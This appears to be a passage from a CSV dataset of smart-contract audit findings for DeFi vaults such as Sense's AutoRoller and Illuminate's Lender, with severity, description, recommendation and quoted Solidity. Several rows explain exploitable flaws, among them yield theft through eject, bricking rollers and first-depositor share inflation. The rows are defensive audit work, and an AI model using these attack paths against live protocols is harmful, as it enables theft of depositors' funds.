(excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n\\nEject allows the user to leave the liquidity pool by withdrawing their liquidity from the Balancer pool and combining the PTs and YTs via divider.combine.\\n```\\nfunction combine(\\n address adapter,\\n uint256 maturity,\\n uint256 uBal\\n) external nonReentrant whenNotPaused returns (uint256 tBal) {\\n if (!adapterMeta[adapter].enabled) revert Errors.InvalidAdapter();\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n uint256 level = adapterMeta[adapter].level;\\n if (level.combineRestricted() && msg.sender != adapter) revert Errors.CombineRestricted();\\n\\n // Burn the PT\\n Token(series[adapter][maturity].pt).burn(msg.sender, uBal);\\n\\n //@audit call of interest\\n uint256 collected = _collect(msg.sender, adapter, maturity, uBal, uBal, address(0));\\n\\n // rest of code\\n\\n // Convert from units of Underlying to units of Target\\n tBal = uBal.fdiv(cscale);\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, msg.sender, tBal);\\n\\n // Notify only when Series is not settled as when it is, the _collect() call above would trigger a _redeemYT which will call notify\\n if (!settled) Adapter(adapter).notify(msg.sender, tBal, false);\\n unchecked {\\n // Safety: bounded by the Target's total token supply\\n tBal += collected;\\n }\\n emit Combined(adapter, maturity, tBal, msg.sender);\\n}\\n```\\n\\n```\\nfunction _collect(\\n address usr,\\n address adapter,\\n uint256 maturity,\\n uint256 uBal,\\n uint256 uBalTransfer,\\n address to\\n) internal returns (uint256 collected) {\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n if (!adapterMeta[adapter].enabled && !_settled(adapter, maturity)) revert Errors.InvalidAdapter();\\n\\n Series memory _series = series[adapter][maturity];\\n uint256 lscale = lscales[adapter][maturity][usr];\\n\\n // rest of code\\n\\n uint256 tBalNow = uBal.fdivUp(_series.maxscale); // preventive round-up towards the protocol\\n uint256 tBalPrev = uBal.fdiv(lscale);\\n unchecked {\\n collected = tBalPrev > tBalNow ? tBalPrev - tBalNow : 0;\\n }\\n\\n //@audit adapter.target is transferred to AutoRoller\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, usr, collected);\\n Adapter(adapter).notify(usr, collected, false); // Distribute reward tokens\\n\\n // rest of code\\n}\\n```\\n\\nInside divider#combine the collected yield from the YTs are transferred to the AutoRoller. The AutoRoller balance will now contain both the collected yield of the YTs and the target yielded by combining. The end of eject transfers this entire balance to the caller, effectively stealing the yield of the entire AutoRoller.",Combine returns the amount of target yielded by combining the PT and YT. This balance is the amount of assets that should be transferred to the user.,User funds given to the wrong person,"```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n" +Adversary can brick AutoRoller by creating another AutoRoller on the same adapter,high,"onSponsorWindowOpened attempts to make a new series at the desired maturity. Each adapter can only have one of each maturity. If the maturity requested already exists then onSponsorWindowOpened will revert, making it impossible to roll the AutoRoller. An adversary can take advantage of this to brick an AutoRoller by creating a second AutoRoller on the same adapter that will create a target maturity before the first AutoRoller. Since the maturity now exists, the first AutoRoller will always revert when trying to Roll.\\n```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n\\nInside AutoRoller#onSponsorWindowOpened the maturity is calculated using RollerUtils#getFutureMaturity. This returns the timestamp the requested months ahead, truncated down to the first of the month. It passes this calculated maturity as the maturity to sponsor a new series.\\n```\\n(ERC20 _pt, YTLike _yt) = periphery.sponsorSeries(address(adapter), _maturity, true);\\n```\\n\\n```\\nfunction sponsorSeries(\\n address adapter,\\n uint256 maturity,\\n bool withPool\\n) external returns (address pt, address yt) {\\n (, address stake, uint256 stakeSize) = Adapter(adapter).getStakeAndTarget();\\n\\n // Transfer stakeSize from sponsor into this contract\\n ERC20(stake).safeTransferFrom(msg.sender, address(this), stakeSize);\\n\\n // Approve divider to withdraw stake assets\\n ERC20(stake).approve(address(divider), stakeSize);\\n\\n (pt, yt) = divider.initSeries(adapter, maturity, msg.sender);\\n\\n // Space pool is always created for verified adapters whilst is optional for unverified ones.\\n // Automatically queueing series is only for verified adapters\\n if (verified[adapter]) {\\n poolManager.queueSeries(adapter, maturity, spaceFactory.create(adapter, maturity));\\n } else {\\n if (withPool) {\\n spaceFactory.create(adapter, maturity);\\n }\\n }\\n emit SeriesSponsored(adapter, maturity, msg.sender);\\n}\\n```\\n\\nperiphery#sponsorSeries is called with true indicating to create a space pool for the newly created series.\\n```\\nfunction create(address adapter, uint256 maturity) external returns (address pool) {\\n address pt = divider.pt(adapter, maturity);\\n _require(pt != address(0), Errors.INVALID_SERIES);\\n _require(pools[adapter][maturity] == address(0), Errors.POOL_ALREADY_EXISTS);\\n\\n pool = address(new Space(\\n vault,\\n adapter,\\n maturity,\\n pt,\\n ts,\\n g1,\\n g2,\\n oracleEnabled\\n ));\\n\\n pools[adapter][maturity] = pool;\\n}\\n```\\n\\nWe run into an issue inside SpaceFactory#create because it only allows a single pool per adapter/maturity. If a pool already exist then it will revert.\\nAn adversary can abuse this revert to brick an existing AutoRoller. Assume AutoRoller A has a duration of 3 months. Its current maturity is December 1st 2022, when rolled it will attempt to create a series at March 1st 2023. An adversary could abuse this and create AutoRoller B with a maturity of 4 months. When they roll for the first time it will create a series with maturity at March 1st 2023. When AutoRoller A attempts to roll it will revert since a series already exists at March 1st 2023.\\nThis conflict can happen accidentally if there is a monthly AutoRoller and a quarterly AutoRoller. It also hinders the viability of using an AutoRoller for an adapter that is popular because the series will likely have been created by the time the autoroller tries to roll into it.",Requiring that the AutoRoller has to create the series seems overly restrictive and leads to a large number of issues. Attempting to join an a series that is already initialized could also lead to pool manipulation rates. It seems like a large refactoring is needed for the rolling section of the AutoRoller,AutoRollers will frequently be bricked,"```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n" +Public vault : Initial depositor can manipulate the price per share value and future depositors are forced to deposit huge value in vault.,high,"Most of the share based vault implementation will face this issue. The vault is based on the ERC4626 where the shares are calculated based on the deposit value. By depositing large amount as initial deposit, initial depositor can influence the future depositors value.\\nBy depositing large amount as initial deposit, first depositor can take advantage over other depositors.\\nI am sharing reference for this type of issue that already reported and acknowledged. This explain how the share price could be manipulated to large value.\\nERC4626 implementation function mint(uint256 shares, address receiver) public virtual returns (uint256 assets) { assets = previewMint(shares); // No need to check for rounding error, previewMint rounds up.\\n```\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n\\n function previewMint(uint256 shares) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares.mulDivUp(totalAssets(), supply);\\n}\\n```\\n","Consider requiring a minimal amount of share tokens to be minted for the first minter, and send a portion of the initial mints as a reserve to the DAO/ burn so that the price per share can be more resistant to manipulation.",Future depositors are forced for huge value of asset to deposit. It is not practically possible for all the users. This could directly affect on the attrition of users towards this system.,"```\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n\\n function previewMint(uint256 shares) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares.mulDivUp(totalAssets(), supply);\\n}\\n```\\n" +Math rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.,medium,"Math rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.\\nFinally, ERC-4626 Vault implementers should be aware of the need for specific, opposing rounding directions across the different mutable and view methods, as it is considered most secure to favor the Vault itself during calculations over its users:\\nIf (1) it's calculating how many shares to issue to a user for a certain amount of the underlying tokens they provide or (2) it's determining the amount of the underlying tokens to transfer to them for returning a certain amount of shares, it should round down. If (1) it's calculating the amount of shares a user has to supply to receive a given amount of the underlying tokens or (2) it's calculating the amount of underlying tokens a user has to provide to receive a certain amount of shares, it should round up.\\nThen previewWithdraw in AutoRoller.sol should round up.\\nThe original implementation for previewWithdraw in Solmate ERC4626 is:\\n```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n\\nIt is rounding up, however in the implementation of the AutoRoller.sol#previewWith is not round up.\\n```\\nfor (uint256 i = 0; i < 20;) { // 20 chosen as a safe bound for convergence from practical trials.\\n if (guess > supply) {\\n guess = supply;\\n }\\n\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n\\n if (answer >= 0 && answer <= assets.mulWadDown(0.001e18).safeCastToInt() || (prevAnswer == answer)) { // Err on the side of overestimating shares needed. Could reduce precision for gas efficiency.\\n break;\\n }\\n\\n if (guess == supply && answer < 0) revert InsufficientLiquidity();\\n\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n\\n unchecked { ++i; }\\n}\\n\\nreturn guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nnote the line:\\n```\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n```\\n\\npreviewRedeem is round down.\\nand later we update guess and return guess\\n```\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n```\\n\\nand\\n```\\n return guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nwhen calculating the the nextGuess, the code does not round up.\\n```\\nint256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n```\\n",Round up in previewWithdraw using mulDivUp and divWadUp,"Other protocols that integrate with Sense finance AutoRoller.sol might wrongly assume that the functions handle rounding as per ERC4626 expectation. Thus, it might cause some intergration problem in the future that can lead to wide range of issues for both parties.","```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n" +Funding Rate calculation is not correct,medium,"According to the docs, the Funding Rate is intended to correspond to the gap between long and short positions that the Float Pool is required to make up. However, as its implemented, the `totalFunding` is calculated only on the size of the overbalanced position, leading to some unexpected situations.\\nAccording to the comments, `totalFunding` is meant to be calculated as follows:\\ntotalFunding is calculated on the notional of between long and short liquidity and 2x long and short liquidity.\\nThis makes sense. The purpose of the funding rate is to compensate the Float Pool for the liquidity provided to balance the market.\\nHowever, the implementation of this function does not accomplish this. Instead, `totalFunding` is based only on the size of the overbalancedValue:\\n```\\nuint256 totalFunding = (2 * overbalancedValue * fundingRateMultiplier * oracleManager.EPOCH_LENGTH()) / (365.25 days * 10000);\\n```\\n\\nThis can be summarized as `2 * overbalancedValue * funding rate percentage * epochs / yr`.\\nThis formula can cause problems, because the size of the overbalanced value doesn't necessarily correspond to the balancing required for the Float Pool.\\nFor these examples, let's set:\\n`fundingRateMultiplier = 100` (1%)\\n`EPOCH_LENGTH() = 3.6525 days` (1% of a year)\\nSITUATION A:\\nOverbalanced: LONG\\nLong Effective Liquidity: 1_000_000 ether\\nShort Effective Liquidity: 999_999 ether\\n`totalFunding = 2 * 1_000_000 ether * 1% * 1% = 200 ether`\\nAmount of balancing supplied by Float = 1mm - 999,999 = 1 ether\\nSITUATION B:\\nOverbalanced: LONG\\nLong Effective Liquidity: 1_000 ether\\nShort Effective Liquidity: 100 ether\\n`totalFunding = 2 * 1_000 ether * 1% * 1% = 0.2 ether`\\nAmount of balancing supplied by Float = 1000 - 100 = 900 ether\\nWe can see that in Situation B, Float supplied 900X more liquidity to the system, and earned 1000X less fees.","Adjust the `totalFunding` formula to represent the stated outcome. A simple example of how that might be accomplished is below, but I'm sure there are better implementations:\\n```\\nuint256 totalFunding = ((overbalancedValue - underbalancedValue) * fundingRateMultiplier * oracle.EPOCH_LENGTH()) / (365.25 days * 10_000);\\n```\\n","Funding Rates will not accomplish the stated objective, and will serve to incentivize pools that rely heavily on Float for balancing, while disincentivizing large, balanced markets.",```\\nuint256 totalFunding = (2 * overbalancedValue * fundingRateMultiplier * oracleManager.EPOCH_LENGTH()) / (365.25 days * 10000);\\n```\\n +Hardcoded divider address in RollerUtils is incorrect and will brick autoroller,medium,"RollerUtils uses a hard-coded constant for the Divider. This address is incorrect and will cause a revert when trying to call AutoRoller#cooldown. If the adapter is combineRestricted then LPs could potentially be unable to withdraw or eject.\\n```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n\\nRollerUtils uses a hardcoded constant DIVIDER to store the Divider address. There are two issues with this. The most pertinent issue is that the current address used is not the correct mainnet address. The second is that if the divider is upgraded, changing the address of the RollerUtils may be forgotten.\\n```\\n (, uint48 prevIssuance, , , , , uint256 iscale, uint256 mscale, ) = DividerLike(DIVIDER).series(adapter, prevMaturity);\\n```\\n\\nWith an incorrect address the divider#series call will revert causing RollerUtils#getNewTargetedRate to revert, which is called in AutoRoller#cooldown. The result is that the AutoRoller cycle can never be completed. LP will be forced to either withdraw or eject to remove their liquidity. Withdraw only works to a certain point because the AutoRoller tries to keep the target ratio. After which the eject would be the only way for LPs to withdraw. During eject the AutoRoller attempts to combine the PT and YT. If the adapter is also combineRestricted then there is no longer any way for the LPs to withdraw, causing loss of their funds.",RollerUtils DIVIDER should be set by constructor. Additionally RollerUtils should be deployed by the factory constructor to make sure they always have the same immutable divider reference.,Incorrect hard-coded divider address will brick autorollers for all adapters and will cause loss of funds for combineRestricted adapters,```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n +AutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0,medium,"AutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0\\nlet us look into the implementation of function roll()\\n```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n\\nnote, if lastSettle is 0, we deposit a small amount of token and mint shares to address(0)\\n```\\ndeposit(firstDeposit, address(0));\\n```\\n\\nFirst deposit is a fairly small amount:\\n```\\nfirstDeposit = (0.01e18 - 1) / scalingFactor + 1;\\n```\\n\\nWe can deposit from ERC4626 implementation:\\n```\\nfunction deposit(uint256 assets, address receiver) public virtual returns (uint256 shares) {\\n // Check for rounding error since we round down in previewDeposit.\\n require((shares = previewDeposit(assets)) != 0, ""ZERO_SHARES"");\\n\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n```\\n\\nnote the restriction:\\n```\\n// Check for rounding error since we round down in previewDeposit.\\nrequire((shares = previewDeposit(assets)) != 0, ""ZERO_SHARES"");\\n\\n// Need to transfer before minting or ERC777s could reenter.\\nasset.safeTransferFrom(msg.sender, address(this), assets);\\n```\\n\\nif previewDeposit returns 0 shares, transaction revert. Can previewDeposit returns 0 shares? it is very possible.\\n```\\nfunction previewDeposit(uint256 assets) public view override returns (uint256) {\\n if (maturity == MATURITY_NOT_SET) {\\n return super.previewDeposit(assets);\\n } else {\\n Space _space = space;\\n (uint256 ptReserves, uint256 targetReserves) = _getSpaceReserves();\\n\\n // Calculate how much Target we'll end up joining the pool with, and use that to preview minted LP shares.\\n uint256 previewedLPBal = (assets - _getTargetForIssuance(ptReserves, targetReserves, assets, adapter.scaleStored()))\\n .mulDivDown(_space.adjustedTotalSupply(), targetReserves);\\n\\n // Shares represent proportional ownership of LP shares the vault holds.\\n return previewedLPBal.mulDivDown(totalSupply, _space.balanceOf(address(this)));\\n }\\n}\\n```\\n\\nIf (previewedLPBal * total) / space balance is truncated to 0, transaction revert. _space.balanceOf can certainly be inflated if malicious actor send the space token to the address manually. Or previewedLPBal * total could just be small and the division is truncated to 0.","We recommend the project not deposit a such small amount, or there could be a function that let admin gradually control how many tokens should we put in the first deposit.",calling roll would revert and the new sponsored series cannot be started properly.,"```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n" +AutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0,medium,"AutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0\\nlet us look into the implementation of function roll()\\n```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n\\nnote, if lastSettle is 0, we deposit a small amount of token and mint shares to address(0)\\n```\\ndeposit(firstDeposit, address(0));\\n```\\n\\nFirst deposit is a fairly small amount:\\n```\\nfirstDeposit = (0.01e18 - 1) / scalingFactor + 1;\\n```\\n\\nWe can deposit from ERC4626 implementation:\\n```\\nfunction deposit(uint256 assets, address receiver) public virtual returns (uint256 shares) {\\n // Check for rounding error since we round down in previewDeposit.\\n require((shares = previewDeposit(assets)) != 0, ""ZERO_SHARES"");\\n\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n```\\n\\nnote the restriction:\\n```\\n// Check for rounding error since we round down in previewDeposit.\\nrequire((shares = previewDeposit(assets)) != 0, ""ZERO_SHARES"");\\n\\n// Need to transfer before minting or ERC777s could reenter.\\nasset.safeTransferFrom(msg.sender, address(this), assets);\\n```\\n\\nif previewDeposit returns 0 shares, transaction revert. Can previewDeposit returns 0 shares? it is very possible.\\n```\\nfunction previewDeposit(uint256 assets) public view override returns (uint256) {\\n if (maturity == MATURITY_NOT_SET) {\\n return super.previewDeposit(assets);\\n } else {\\n Space _space = space;\\n (uint256 ptReserves, uint256 targetReserves) = _getSpaceReserves();\\n\\n // Calculate how much Target we'll end up joining the pool with, and use that to preview minted LP shares.\\n uint256 previewedLPBal = (assets - _getTargetForIssuance(ptReserves, targetReserves, assets, adapter.scaleStored()))\\n .mulDivDown(_space.adjustedTotalSupply(), targetReserves);\\n\\n // Shares represent proportional ownership of LP shares the vault holds.\\n return previewedLPBal.mulDivDown(totalSupply, _space.balanceOf(address(this)));\\n }\\n}\\n```\\n\\nIf (previewedLPBal * total) / space balance is truncated to 0, transaction revert. _space.balanceOf can certainly be inflated if malicious actor send the space token to the address manually. Or previewedLPBal * total could just be small and the division is truncated to 0.","We recommend the project not deposit a such small amount, or there could be a function that let admin gradually control how many tokens should we put in the first deposit.",calling roll would revert and the new sponsored series cannot be started properly.,"```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n" +Math rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.,medium,"Math rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.\\nFinally, ERC-4626 Vault implementers should be aware of the need for specific, opposing rounding directions across the different mutable and view methods, as it is considered most secure to favor the Vault itself during calculations over its users:\\nIf (1) it's calculating how many shares to issue to a user for a certain amount of the underlying tokens they provide or (2) it's determining the amount of the underlying tokens to transfer to them for returning a certain amount of shares, it should round down. If (1) it's calculating the amount of shares a user has to supply to receive a given amount of the underlying tokens or (2) it's calculating the amount of underlying tokens a user has to provide to receive a certain amount of shares, it should round up.\\nThen previewWithdraw in AutoRoller.sol should round up.\\nThe original implementation for previewWithdraw in Solmate ERC4626 is:\\n```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n\\nIt is rounding up, however in the implementation of the AutoRoller.sol#previewWith is not round up.\\n```\\nfor (uint256 i = 0; i < 20;) { // 20 chosen as a safe bound for convergence from practical trials.\\n if (guess > supply) {\\n guess = supply;\\n }\\n\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n\\n if (answer >= 0 && answer <= assets.mulWadDown(0.001e18).safeCastToInt() || (prevAnswer == answer)) { // Err on the side of overestimating shares needed. Could reduce precision for gas efficiency.\\n break;\\n }\\n\\n if (guess == supply && answer < 0) revert InsufficientLiquidity();\\n\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n\\n unchecked { ++i; }\\n}\\n\\nreturn guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nnote the line:\\n```\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n```\\n\\npreviewRedeem is round down.\\nand later we update guess and return guess\\n```\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n```\\n\\nand\\n```\\n return guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nwhen calculating the the nextGuess, the code does not round up.\\n```\\nint256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n```\\n",Round up in previewWithdraw using mulDivUp and divWadUp,"Other protocols that integrate with Sense finance AutoRoller.sol might wrongly assume that the functions handle rounding as per ERC4626 expectation. Thus, it might cause some intergration problem in the future that can lead to wide range of issues for both parties.","```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n" +Lender#lend for Sense has mismatched decimals,high,"The decimals of the Sense principal token don't match the decimals of the ERC5095 vault it mints shares to. This can be abused on the USDC market to mint a large number of shares to steal yield from all other users.\\n```\\n uint256 received;\\n {\\n // Get the starting balance of the principal token\\n uint256 starting = token.balanceOf(address(this));\\n\\n // Swap those tokens for the principal tokens\\n ISensePeriphery(x).swapUnderlyingForPTs(adapter, s, lent, r);\\n\\n // Calculate number of principal tokens received in the swap\\n received = token.balanceOf(address(this)) - starting;\\n\\n // Verify that we received the principal tokens\\n if (received < r) {\\n revert Exception(11, 0, 0, address(0), address(0));\\n }\\n }\\n\\n // Mint the Illuminate tokens based on the returned amount\\n IERC5095(principalToken(u, m)).authMint(msg.sender, received);\\n```\\n\\nSense principal tokens for DIA and USDC are 8 decimals to match the decimals of the underlying cTokens, cUSDC and cDAI. The decimals of the ERC5095 vault matches the underlying of the vault. This creates a disparity in decimals that aren't adjusted for in Lender#lend for Sense, which assumes that the vault and Sense principal tokens match in decimals. In the example of USDC the ERC5095 will be 6 decimals but the sense token will be 8 decimals. Each 1e6 USDC token will result in ~1e8 Sense tokens being received. Since the contract mints based on the difference in the number of sense tokens before and after the call, it will mint ~100x the number of vault shares than it should. Since the final yield is distributed pro-rata to the number of shares, the user who minted with sense will be entitled to much more yield than they should be and everyone else will get substantially less.",Issue Lender#lend for Sense has mismatched decimals\\nQuery the decimals of the Sense principal and use that to adjust the decimals to match the decimals of the vault.,User can mint large number of shares to steal funds from other users,"```\\n uint256 received;\\n {\\n // Get the starting balance of the principal token\\n uint256 starting = token.balanceOf(address(this));\\n\\n // Swap those tokens for the principal tokens\\n ISensePeriphery(x).swapUnderlyingForPTs(adapter, s, lent, r);\\n\\n // Calculate number of principal tokens received in the swap\\n received = token.balanceOf(address(this)) - starting;\\n\\n // Verify that we received the principal tokens\\n if (received < r) {\\n revert Exception(11, 0, 0, address(0), address(0));\\n }\\n }\\n\\n // Mint the Illuminate tokens based on the returned amount\\n IERC5095(principalToken(u, m)).authMint(msg.sender, received);\\n```\\n" +Lend or mint after maturity,high,"The protocol does not forbid lending or minting after the maturity leaving the possibility to profit from early users.\\nLet's take the mint function as an example:\\n```\\n function mint(\\n uint8 p,\\n address u,\\n uint256 m,\\n uint256 a\\n ) external unpaused(u, m, p) returns (bool) {\\n // Fetch the desired principal token\\n address principal = IMarketPlace(marketPlace).token(u, m, p);\\n\\n // Transfer the users principal tokens to the lender contract\\n Safe.transferFrom(IERC20(principal), 